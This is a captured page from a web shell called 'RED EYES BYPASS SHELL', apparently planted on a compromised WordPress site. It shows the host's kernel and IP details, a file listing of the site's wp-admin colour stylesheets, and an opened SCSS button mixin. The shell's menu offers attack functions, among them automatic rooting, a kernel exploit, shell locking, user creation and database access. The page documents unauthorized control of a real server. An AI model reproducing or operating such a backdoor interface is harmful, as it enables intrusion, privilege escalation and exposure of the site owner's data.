Linux webm007.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.7 | : 216.73.217.26
Cant Read [ /etc/named.conf ]
eglisebaa
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
eglisebaa /
demo /
wp-admin /
css /
colors /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
blue
[ DIR ]
drwx---r-x
coffee
[ DIR ]
drwx---r-x
ectoplasm
[ DIR ]
drwx---r-x
light
[ DIR ]
drwx---r-x
midnight
[ DIR ]
drwx---r-x
ocean
[ DIR ]
drwx---r-x
sunrise
[ DIR ]
drwx---r-x
.htaccess
148
B
-r--r--r--
_admin.scss
13.82
KB
-rw----r--
_mixins.scss
1.07
KB
-rw----r--
_variables.scss
2.07
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _mixins.scss
/* * Button mixin- creates a button effect with correct * highlights/shadows, based on a base color. */ @mixin button( $button-color, $button-text-color: #fff ) { background: $button-color; border-color: $button-color; color: $button-text-color; &:hover, &:focus { background: lighten( $button-color, 3% ); border-color: darken( $button-color, 3% ); color: $button-text-color; } &:focus { box-shadow: 0 0 0 1px #fff, 0 0 0 3px $button-color; } &:active { background: darken( $button-color, 5% ); border-color: darken( $button-color, 5% ); color: $button-text-color; } &.active, &.active:focus, &.active:hover { background: $button-color; color: $button-text-color; border-color: darken( $button-color, 15% ); box-shadow: inset 0 2px 5px -3px darken( $button-color, 50% ); } &[disabled], &:disabled, &.button-primary-disabled, &.disabled { color: hsl( hue( $button-color ), 10%, 80% ) !important; background: darken( $button-color, 8% ) !important; border-color: darken( $button-color, 8% ) !important; text-shadow: none !important; } }
Close